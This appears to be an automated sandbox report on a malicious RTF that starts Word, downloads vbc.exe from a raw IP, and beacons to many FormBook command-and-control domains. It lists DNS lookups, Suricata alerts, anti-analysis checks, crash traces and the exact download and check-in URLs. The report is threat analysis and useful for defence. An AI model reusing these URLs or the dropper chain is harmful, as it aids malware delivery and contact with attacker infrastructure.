Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	Oct. 6, 2021, 1:24 p.m.	Oct. 6, 2021, 1:30 p.m.

Size	13.6KB
Type	data
MD5	`9f33914979fc685f81ab79066877d01c`
SHA256	`4fe2dad2a4aa831e4c64fed6a52949e7d9eff9dee767efe9ff91ccfc1eb00dc7`
CRC32	`26F5D906`
ssdeep	`192:9mOdF6ZH1MZLijkFDXKtBXan89nkhKXYMzS4BOQeco8NaCHsEQ/aaL+hUFeXKbcu:9RqJ1M9ijgwn7Y/4wsjJ1Q3L+h2cf7a`
Yara	Rich_Text_Format_Zero - Rich Text Format Signature Zero

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "lHKkwiDv" C:\Users\test22\AppData\Local\Temp\gyty.wbk
2648
- WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  2852
  - splwow64.exe C:\Windows\splwow64.exe 12288
    1316

Name	Response	Post-Analysis Lookup
www.tradeplay.net	A 104.21.2.9 A 172.67.128.125	172.67.128.125
www.puremicrodosing.com	A 91.184.0.100 CNAME puremicrodosing.com	91.184.0.100
www.standunitedforamerica.us	CNAME standunitedforamerica.us A 34.102.136.180	34.102.136.180
www.wandawallinbristow.com	A 192.249.119.170 CNAME wandawallinbristow.com	192.249.119.170
www.110cy.top	A 156.241.132.45	156.241.132.45
www.blinglj.com	CNAME shops.myshopify.com A 23.227.38.74	23.227.38.74
www.happinessfashionline.com	CNAME s.website.thryv.com A 35.172.94.1 A 100.24.208.97 CNAME s.partnerwebsitedns.com	100.24.208.97
www.tamaracastrillejo.com	A 172.67.155.197 A 104.21.42.37	104.21.42.37
www.bgcs.online
www.xaudix.com	CNAME xaudix.com A 182.50.132.242	182.50.132.242
www.tasteofgadsdencounty.com	CNAME tasteofgadsdencounty.com A 34.102.136.180	34.102.136.180
www.minisoshop.com	CNAME HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com A 3.223.115.185	3.223.115.185
www.oarlary.xyz	A 104.21.34.240 A 172.67.166.87	104.21.34.240
www.shopmoly.com	A 128.199.158.128	128.199.158.128
www.apeironnature.com	CNAME apeironnature.com A 34.102.136.180	34.102.136.180

IP Address	Status	Action
100.24.208.97	Active	Moloch
104.21.2.9	Active	Moloch
128.199.158.128	Active	Moloch
156.241.132.45	Active	Moloch
164.124.101.2	Active	Moloch
172.67.155.197	Active	Moloch
172.67.166.87	Active	Moloch
182.50.132.242	Active	Moloch
192.249.119.170	Active	Moloch
198.12.107.117	Active	Moloch
23.227.38.74	Active	Moloch
3.223.115.185	Active	Moloch
34.102.136.180	Active	Moloch
91.184.0.100	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.101:50851 -> 164.124.101.2:53	2023883	ET DNS Query to a *.top domain - Likely Hostile	Potentially Bad Traffic
TCP 192.168.56.101:49204 -> 198.12.107.117:80	2016141	ET INFO Executable Download from dotted-quad Host	A Network Trojan was detected
TCP 192.168.56.101:49204 -> 198.12.107.117:80	2019714	ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile	Potentially Bad Traffic
TCP 192.168.56.101:49221 -> 128.199.158.128:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49226 -> 156.241.132.45:80	2023882	ET INFO HTTP Request to a *.top domain	Potentially Bad Traffic
TCP 192.168.56.101:49221 -> 128.199.158.128:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49221 -> 128.199.158.128:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 198.12.107.117:80 -> 192.168.56.101:49204	2022050	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1	A Network Trojan was detected
TCP 192.168.56.101:49237 -> 172.67.155.197:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49237 -> 172.67.155.197:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49237 -> 172.67.155.197:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49223 -> 34.102.136.180:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49223 -> 34.102.136.180:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49223 -> 34.102.136.180:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49211 -> 104.21.2.9:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49211 -> 104.21.2.9:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49211 -> 104.21.2.9:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 198.12.107.117:80 -> 192.168.56.101:49204	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 192.168.56.101:49215 -> 23.227.38.74:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 198.12.107.117:80 -> 192.168.56.101:49204	2022051	ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2	A Network Trojan was detected
TCP 192.168.56.101:49215 -> 23.227.38.74:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 198.12.107.117:80 -> 192.168.56.101:49204	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.101:49215 -> 23.227.38.74:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49225 -> 192.249.119.170:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49225 -> 192.249.119.170:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49225 -> 192.249.119.170:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49232 -> 172.67.166.87:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49232 -> 172.67.166.87:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49232 -> 172.67.166.87:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49232 -> 172.67.166.87:80	2031088	ET HUNTING Request to .XYZ Domain with Minimal Headers	Potentially Bad Traffic
TCP 192.168.56.101:49234 -> 100.24.208.97:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49234 -> 100.24.208.97:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49234 -> 100.24.208.97:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49227 -> 156.241.132.45:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49227 -> 156.241.132.45:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49227 -> 156.241.132.45:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49227 -> 156.241.132.45:80	2031089	ET HUNTING Request to .TOP Domain with Minimal Headers	Potentially Bad Traffic
TCP 192.168.56.101:49229 -> 34.102.136.180:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49229 -> 34.102.136.180:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49229 -> 34.102.136.180:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49213 -> 34.102.136.180:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49213 -> 34.102.136.180:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49213 -> 34.102.136.180:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49219 -> 91.184.0.100:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49219 -> 91.184.0.100:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49219 -> 91.184.0.100:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49217 -> 182.50.132.242:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49217 -> 182.50.132.242:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49217 -> 182.50.132.242:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49239 -> 3.223.115.185:80	2031412	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49239 -> 3.223.115.185:80	2031449	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected
TCP 192.168.56.101:49239 -> 3.223.115.185:80	2031453	ET MALWARE FormBook CnC Checkin (GET)	Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Oct. 6, 2021, 1:24 p.m.			0	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office\12.0\Registration\{90120000-0030-0000-0000-0000000FF1CE}\DigitalProductID

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Oct. 6, 2021, 1:24 p.m.		1	1	0

One or more processes crashed (2 events)

Time & API	Arguments	Status	Return	Repeated
__exception__ Oct. 6, 2021, 1:24 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x74bfc8e2 CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x74af98ad OleCreateEmbeddingHelper+0x2a1 CreateFileMoniker-0x17de ole32+0x81414 @ 0x74b41414 ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x74b57b68 wdGetApplicationObject+0x131f9 wdCommandDispatch-0x4c476 wwlib+0x394dff @ 0x6fee4dff DllCanUnloadNow+0xbaf5e wwlib+0x9692a0 @ 0x704b92a0 DllCanUnloadNow+0x339ef0 wwlib+0xbe8232 @ 0x70738232 DllCanUnloadNow+0x54e0c9 wwlib+0xdfc40b @ 0x7094c40b DllCanUnloadNow+0x55865b wwlib+0xe0699d @ 0x7095699d DllCanUnloadNow+0x33bec4 wwlib+0xbea206 @ 0x7073a206 DllCanUnloadNow+0xbd684 wwlib+0x96b9c6 @ 0x704bb9c6 DllCanUnloadNow+0x215f8 wwlib+0x8cf93a @ 0x7041f93a DllGetClassObject+0x2d9ac DllGetLCID-0x22ded4 wwlib+0x325f6 @ 0x6fb825f6 DllGetClassObject+0x5b213 DllGetLCID-0x20066d wwlib+0x5fe5d @ 0x6fbafe5d DllGetClassObject+0x5a904 DllGetLCID-0x200f7c wwlib+0x5f54e @ 0x6fbaf54e DllCanUnloadNow+0x54a145 wwlib+0xdf8487 @ 0x70948487 DllCanUnloadNow+0x547005 wwlib+0xdf5347 @ 0x70945347 DllCanUnloadNow+0x54a030 wwlib+0xdf8372 @ 0x70948372 DllCanUnloadNow+0x511e8b wwlib+0xdc01cd @ 0x709101cd DllCanUnloadNow+0x55a473 wwlib+0xe087b5 @ 0x709587b5 DllGetClassObject+0x8b969 DllGetLCID-0x1cff17 wwlib+0x905b3 @ 0x6fbe05b3 wdCommandDispatch+0x3e8329 DllCanUnloadNow-0xe4da4 wwlib+0x7c959e @ 0x7031959e wdCommandDispatch+0x3e89b2 DllCanUnloadNow-0xe471b wwlib+0x7c9c27 @ 0x70319c27 DllCanUnloadNow+0x395760 wwlib+0xc43aa2 @ 0x70793aa2 DllCanUnloadNow+0x395b92 wwlib+0xc43ed4 @ 0x70793ed4 DllGetClassObject+0x5ed15 DllGetLCID-0x1fcb6b wwlib+0x6395f @ 0x6fbb395f DllGetClassObject+0x78b76 DllGetLCID-0x1e2d0a wwlib+0x7d7c0 @ 0x6fbcd7c0 DllGetClassObject+0x5db61 DllGetLCID-0x1fdd1f wwlib+0x627ab @ 0x6fbb27ab FMain+0x6ac DllGetClassObject-0x3c wwlib+0x4c0e @ 0x6fb54c0e wdCommandDispatch-0x2ed winword+0x15d7 @ 0x2fe415d7 wdCommandDispatch-0x367 winword+0x155d @ 0x2fe4155d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x800706be exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 2861836 registers.edi: 1957755408 registers.eax: 2861836 registers.ebp: 2861916 registers.edx: 2130566132 registers.ebx: 7629628 registers.esi: 2147944126 registers.ecx: 1208767861	1	0	0
__exception__ Oct. 6, 2021, 1:24 p.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x74bfc8e2 CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x74af98ad CoRegisterMessageFilter+0x5048 ObjectStublessClient5-0x21 ole32+0x3b641 @ 0x74afb641 CoRegisterMessageFilter+0x4ff4 ObjectStublessClient5-0x75 ole32+0x3b5ed @ 0x74afb5ed CoRegisterMessageFilter+0x4b79 ObjectStublessClient5-0x4f0 ole32+0x3b172 @ 0x74afb172 CoRegisterMessageFilter+0x4075 ObjectStublessClient5-0xff4 ole32+0x3a66e @ 0x74afa66e ObjectStublessClient31+0x2961c STGMEDIUM_UserUnmarshal-0x92 ole32+0xba68c @ 0x74b7a68c ObjectStublessClient31+0x6776 STGMEDIUM_UserUnmarshal-0x22f38 ole32+0x977e6 @ 0x74b577e6 OleCreateEmbeddingHelper+0x344 CreateFileMoniker-0x173b ole32+0x814b7 @ 0x74b414b7 ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x74b57b68 wdGetApplicationObject+0x131f9 wdCommandDispatch-0x4c476 wwlib+0x394dff @ 0x6fee4dff DllCanUnloadNow+0xbaf5e wwlib+0x9692a0 @ 0x704b92a0 DllCanUnloadNow+0x339ef0 wwlib+0xbe8232 @ 0x70738232 DllCanUnloadNow+0x54e0c9 wwlib+0xdfc40b @ 0x7094c40b DllCanUnloadNow+0x55865b wwlib+0xe0699d @ 0x7095699d DllCanUnloadNow+0x33bec4 wwlib+0xbea206 @ 0x7073a206 DllCanUnloadNow+0xbd684 wwlib+0x96b9c6 @ 0x704bb9c6 DllCanUnloadNow+0x215f8 wwlib+0x8cf93a @ 0x7041f93a DllGetClassObject+0x2d9ac DllGetLCID-0x22ded4 wwlib+0x325f6 @ 0x6fb825f6 DllGetClassObject+0x5b213 DllGetLCID-0x20066d wwlib+0x5fe5d @ 0x6fbafe5d DllGetClassObject+0x5a904 DllGetLCID-0x200f7c wwlib+0x5f54e @ 0x6fbaf54e DllCanUnloadNow+0x54a145 wwlib+0xdf8487 @ 0x70948487 DllCanUnloadNow+0x547005 wwlib+0xdf5347 @ 0x70945347 DllCanUnloadNow+0x54a030 wwlib+0xdf8372 @ 0x70948372 DllCanUnloadNow+0x511e8b wwlib+0xdc01cd @ 0x709101cd DllCanUnloadNow+0x55a473 wwlib+0xe087b5 @ 0x709587b5 DllGetClassObject+0x8b969 DllGetLCID-0x1cff17 wwlib+0x905b3 @ 0x6fbe05b3 wdCommandDispatch+0x3e8329 DllCanUnloadNow-0xe4da4 wwlib+0x7c959e @ 0x7031959e wdCommandDispatch+0x3e89b2 DllCanUnloadNow-0xe471b wwlib+0x7c9c27 @ 0x70319c27 DllCanUnloadNow+0x395760 wwlib+0xc43aa2 @ 0x70793aa2 DllCanUnloadNow+0x395b92 wwlib+0xc43ed4 @ 0x70793ed4 DllGetClassObject+0x5ed15 DllGetLCID-0x1fcb6b wwlib+0x6395f @ 0x6fbb395f DllGetClassObject+0x78b76 DllGetLCID-0x1e2d0a wwlib+0x7d7c0 @ 0x6fbcd7c0 DllGetClassObject+0x5db61 DllGetLCID-0x1fdd1f wwlib+0x627ab @ 0x6fbb27ab FMain+0x6ac DllGetClassObject-0x3c wwlib+0x4c0e @ 0x6fb54c0e wdCommandDispatch-0x2ed winword+0x15d7 @ 0x2fe415d7 wdCommandDispatch-0x367 winword+0x155d @ 0x2fe4155d BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x800706ba exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 2861528 registers.edi: 1957755408 registers.eax: 2861528 registers.ebp: 2861608 registers.edx: 2130566132 registers.ebx: 7629124 registers.esi: 2147944122 registers.ecx: 1208767861	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

Oct. 6, 2021, 1:24 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b
WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x74bfc8e2
CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x74af98ad
OleCreateEmbeddingHelper+0x2a1 CreateFileMoniker-0x17de ole32+0x81414 @ 0x74b41414
ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x74b57b68
wdGetApplicationObject+0x131f9 wdCommandDispatch-0x4c476 wwlib+0x394dff @ 0x6fee4dff
DllCanUnloadNow+0xbaf5e wwlib+0x9692a0 @ 0x704b92a0
DllCanUnloadNow+0x339ef0 wwlib+0xbe8232 @ 0x70738232
DllCanUnloadNow+0x54e0c9 wwlib+0xdfc40b @ 0x7094c40b
DllCanUnloadNow+0x55865b wwlib+0xe0699d @ 0x7095699d
DllCanUnloadNow+0x33bec4 wwlib+0xbea206 @ 0x7073a206
DllCanUnloadNow+0xbd684 wwlib+0x96b9c6 @ 0x704bb9c6
DllCanUnloadNow+0x215f8 wwlib+0x8cf93a @ 0x7041f93a
DllGetClassObject+0x2d9ac DllGetLCID-0x22ded4 wwlib+0x325f6 @ 0x6fb825f6
DllGetClassObject+0x5b213 DllGetLCID-0x20066d wwlib+0x5fe5d @ 0x6fbafe5d
DllGetClassObject+0x5a904 DllGetLCID-0x200f7c wwlib+0x5f54e @ 0x6fbaf54e
DllCanUnloadNow+0x54a145 wwlib+0xdf8487 @ 0x70948487
DllCanUnloadNow+0x547005 wwlib+0xdf5347 @ 0x70945347
DllCanUnloadNow+0x54a030 wwlib+0xdf8372 @ 0x70948372
DllCanUnloadNow+0x511e8b wwlib+0xdc01cd @ 0x709101cd
DllCanUnloadNow+0x55a473 wwlib+0xe087b5 @ 0x709587b5
DllGetClassObject+0x8b969 DllGetLCID-0x1cff17 wwlib+0x905b3 @ 0x6fbe05b3
wdCommandDispatch+0x3e8329 DllCanUnloadNow-0xe4da4 wwlib+0x7c959e @ 0x7031959e
wdCommandDispatch+0x3e89b2 DllCanUnloadNow-0xe471b wwlib+0x7c9c27 @ 0x70319c27
DllCanUnloadNow+0x395760 wwlib+0xc43aa2 @ 0x70793aa2
DllCanUnloadNow+0x395b92 wwlib+0xc43ed4 @ 0x70793ed4
DllGetClassObject+0x5ed15 DllGetLCID-0x1fcb6b wwlib+0x6395f @ 0x6fbb395f
DllGetClassObject+0x78b76 DllGetLCID-0x1e2d0a wwlib+0x7d7c0 @ 0x6fbcd7c0
DllGetClassObject+0x5db61 DllGetLCID-0x1fdd1f wwlib+0x627ab @ 0x6fbb27ab
FMain+0x6ac DllGetClassObject-0x3c wwlib+0x4c0e @ 0x6fb54c0e
wdCommandDispatch-0x2ed winword+0x15d7 @ 0x2fe415d7
wdCommandDispatch-0x367 winword+0x155d @ 0x2fe4155d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x800706be
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 2861836
registers.edi: 1957755408
registers.eax: 2861836
registers.ebp: 2861916
registers.edx: 2130566132
registers.ebx: 7629628
registers.esi: 2147944126
registers.ecx: 1208767861

__exception__

Oct. 6, 2021, 1:24 p.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b
WdtpInterfacePointer_UserUnmarshal+0x166b DllDebugObjectRPCHook-0x2d8d ole32+0x13c8e2 @ 0x74bfc8e2
CoRegisterMessageFilter+0x32b4 ObjectStublessClient5-0x1db5 ole32+0x398ad @ 0x74af98ad
CoRegisterMessageFilter+0x5048 ObjectStublessClient5-0x21 ole32+0x3b641 @ 0x74afb641
CoRegisterMessageFilter+0x4ff4 ObjectStublessClient5-0x75 ole32+0x3b5ed @ 0x74afb5ed
CoRegisterMessageFilter+0x4b79 ObjectStublessClient5-0x4f0 ole32+0x3b172 @ 0x74afb172
CoRegisterMessageFilter+0x4075 ObjectStublessClient5-0xff4 ole32+0x3a66e @ 0x74afa66e
ObjectStublessClient31+0x2961c STGMEDIUM_UserUnmarshal-0x92 ole32+0xba68c @ 0x74b7a68c
ObjectStublessClient31+0x6776 STGMEDIUM_UserUnmarshal-0x22f38 ole32+0x977e6 @ 0x74b577e6
OleCreateEmbeddingHelper+0x344 CreateFileMoniker-0x173b ole32+0x814b7 @ 0x74b414b7
ObjectStublessClient31+0x6af8 STGMEDIUM_UserUnmarshal-0x22bb6 ole32+0x97b68 @ 0x74b57b68
wdGetApplicationObject+0x131f9 wdCommandDispatch-0x4c476 wwlib+0x394dff @ 0x6fee4dff
DllCanUnloadNow+0xbaf5e wwlib+0x9692a0 @ 0x704b92a0
DllCanUnloadNow+0x339ef0 wwlib+0xbe8232 @ 0x70738232
DllCanUnloadNow+0x54e0c9 wwlib+0xdfc40b @ 0x7094c40b
DllCanUnloadNow+0x55865b wwlib+0xe0699d @ 0x7095699d
DllCanUnloadNow+0x33bec4 wwlib+0xbea206 @ 0x7073a206
DllCanUnloadNow+0xbd684 wwlib+0x96b9c6 @ 0x704bb9c6
DllCanUnloadNow+0x215f8 wwlib+0x8cf93a @ 0x7041f93a
DllGetClassObject+0x2d9ac DllGetLCID-0x22ded4 wwlib+0x325f6 @ 0x6fb825f6
DllGetClassObject+0x5b213 DllGetLCID-0x20066d wwlib+0x5fe5d @ 0x6fbafe5d
DllGetClassObject+0x5a904 DllGetLCID-0x200f7c wwlib+0x5f54e @ 0x6fbaf54e
DllCanUnloadNow+0x54a145 wwlib+0xdf8487 @ 0x70948487
DllCanUnloadNow+0x547005 wwlib+0xdf5347 @ 0x70945347
DllCanUnloadNow+0x54a030 wwlib+0xdf8372 @ 0x70948372
DllCanUnloadNow+0x511e8b wwlib+0xdc01cd @ 0x709101cd
DllCanUnloadNow+0x55a473 wwlib+0xe087b5 @ 0x709587b5
DllGetClassObject+0x8b969 DllGetLCID-0x1cff17 wwlib+0x905b3 @ 0x6fbe05b3
wdCommandDispatch+0x3e8329 DllCanUnloadNow-0xe4da4 wwlib+0x7c959e @ 0x7031959e
wdCommandDispatch+0x3e89b2 DllCanUnloadNow-0xe471b wwlib+0x7c9c27 @ 0x70319c27
DllCanUnloadNow+0x395760 wwlib+0xc43aa2 @ 0x70793aa2
DllCanUnloadNow+0x395b92 wwlib+0xc43ed4 @ 0x70793ed4
DllGetClassObject+0x5ed15 DllGetLCID-0x1fcb6b wwlib+0x6395f @ 0x6fbb395f
DllGetClassObject+0x78b76 DllGetLCID-0x1e2d0a wwlib+0x7d7c0 @ 0x6fbcd7c0
DllGetClassObject+0x5db61 DllGetLCID-0x1fdd1f wwlib+0x627ab @ 0x6fbb27ab
FMain+0x6ac DllGetClassObject-0x3c wwlib+0x4c0e @ 0x6fb54c0e
wdCommandDispatch-0x2ed winword+0x15d7 @ 0x2fe415d7
wdCommandDispatch-0x367 winword+0x155d @ 0x2fe4155d
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x800706ba
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 2861528
registers.edi: 1957755408
registers.eax: 2861528
registers.ebp: 2861608
registers.edx: 2130566132
registers.ebx: 7629124
registers.esi: 2147944122
registers.ecx: 1208767861

HTTP traffic contains suspicious features which may be indicative of malware related traffic (15 events)

suspicious_features	Connection to IP address	suspicious_request	GET http://198.12.107.117/0789/vbc.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.tradeplay.net/p08r/?sZ=4thJWcvRSTe4hV1bGSZ95meEdt450t9mNZxRaqxPEFoJU5xgEKef2WLJHyAlacZU2kQP+u82&4hO=NVxxIf
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.tasteofgadsdencounty.com/p08r/?sZ=r9Yl5R9exgSt+THckHRGQHMSQ7lUP1MIKTFoA2QCQOTNM6XNLCYZhM17LQ5O2O7QDP/PNXJW&4hO=NVxxIf
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.blinglj.com/p08r/?sZ=VhZ5aNjufsg8yIKFt86vwNN5rsRGseTwSosfAD2rdPJJdPLarQSvJQIy1XR6o6k+V62Ea4hf&4hO=NVxxIf
suspicious_features	GET method with no useragent header	suspicious_request	GET http://www.xaudix.com/p08r/?sZ=AfsQzanRa/K71Sp+FC4vF/VUIPkDyKYCI0bhlWQZ5rKPtKnDleIrjtZ/eJx+lPng/2gI4886&4hO=NVxxIf
